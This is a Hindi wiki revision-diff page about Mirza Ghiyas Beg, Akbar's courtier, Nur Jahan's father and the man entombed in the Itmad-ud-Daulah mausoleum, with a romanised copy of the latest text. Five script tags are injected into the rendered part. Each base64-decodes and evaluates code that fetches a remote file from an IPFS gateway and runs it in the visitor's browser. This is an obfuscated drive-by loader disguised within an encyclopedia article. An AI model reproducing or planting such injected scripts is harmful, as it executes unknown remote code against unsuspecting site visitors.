Difference between revisions of "मिर्ज़ा ग़ियासबेग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*गियासबेग़ [[ईरान]] से आया था और [[अकबर]] का दरबारी था।
+
*'''मिर्ज़ा ग़ियासबेग''' [[ईरान]] से आया था और [[अकबर]] का एक प्रमुख दरबारी था।
 
*वह प्रसिद्ध [[नूरजहाँ]] का पिता था, जिससे बादशाह [[जहाँगीर]] ने 1611 ई. में विवाह किया था।
 
*वह प्रसिद्ध [[नूरजहाँ]] का पिता था, जिससे बादशाह [[जहाँगीर]] ने 1611 ई. में विवाह किया था।
*गियासबेग़ तथा उसके बेटे [[आसफ़ ख़ाँ]] को जहाँगीर ने अपने दरबार में बड़े ऊँचे पद प्रदान किये थे।
+
*ग़ियासबेग तथा उसके बेटे [[आसफ़ ख़ाँ]] को जहाँगीर ने अपने दरबार में बड़े ऊँचे पद प्रदान किये थे।
*उसकी मृत्यु 1622 ई. में हुई और उसकी प्यारी बेटी, मलका [[नूरजहाँ]] ने उसकी क़ब्र पर सफ़ेद संगमरमर का सुन्दर मक़बरा बनवाया।
+
*ग़ियासबेग की मृत्यु 1622 ई. में हुई और उसकी प्यारी बेटी मलका नूरजहाँ ने उसकी क़ब्र पर [[सफ़ेद रंग|सफ़ेद]] संगमरमर का सुन्दर मक़बरा बनवाया।
*गियासबेग़ के मक़बरे का नाम एत्मादुद्दौला है।
+
*ग़ियासबेग के मक़बरे को '[[एतमादुद्दौला का मक़बरा]]' के नाम से भी जाना जाता है।
*[[मुग़ल]] इमारतों में उसके जोड़ की कोई दूसरी इमारत नहीं है। अपनी नफ़ासत और महीन पच्चीकारी में यह इमारत अपने आप में एक बेहतर नमूना है।-[[जेम्स फ़र्गुसन]]
+
*[[मुग़ल]] इमारतों में उसके जोड़ की कोई दूसरी इमारत नहीं है।
*बादशाह [[जहाँगीर]] द्वारा गद्दी पर बैठने के बाद मिर्ज़ा गियासबेग़ को एत्मादुद्दौला उपाधि प्रदान की गई।
+
*[[जेम्स फ़र्गुसन]] के अनुसार-"अपनी नफ़ासत और महीन पच्चीकारी में यह इमारत अपने आप में एक बेहतर नमूना है।"
 +
*बादशाह [[जहाँगीर]] द्वारा गद्दी पर बैठने के बाद मिर्ज़ा ग़ियासबेग को 'एतमादुद्दौला' की उपाधि प्रदान की गई थी।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 18: Line 19:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{मध्य काल}}
 +
{{मुग़ल साम्राज्य}}
 
[[Category:मुग़ल साम्राज्य]]
 
[[Category:मुग़ल साम्राज्य]]
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:20, 22 January 2012

  • mirza giyasabeg eeran se aya tha aur akabar ka ek pramukh darabari tha.
  • vah prasiddh noorajahaan ka pita tha, jisase badashah jahaangir ne 1611 ee. mean vivah kiya tha.
  • giyasabeg tatha usake bete asaf khaan ko jahaangir ne apane darabar mean b de ooanche pad pradan kiye the.
  • giyasabeg ki mrityu 1622 ee. mean huee aur usaki pyari beti malaka noorajahaan ne usaki qabr par safed sangamaramar ka sundar maqabara banavaya.
  • giyasabeg ke maqabare ko 'etamaduddaula ka maqabara' ke nam se bhi jana jata hai.
  • mugal imaratoan mean usake jo d ki koee doosari imarat nahian hai.
  • jems fargusan ke anusar-"apani nafasat aur mahin pachchikari mean yah imarat apane ap mean ek behatar namoona hai."
  • badashah jahaangir dvara gaddi par baithane ke bad mirza giyasabeg ko 'etamaduddaula' ki upadhi pradan ki gee thi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>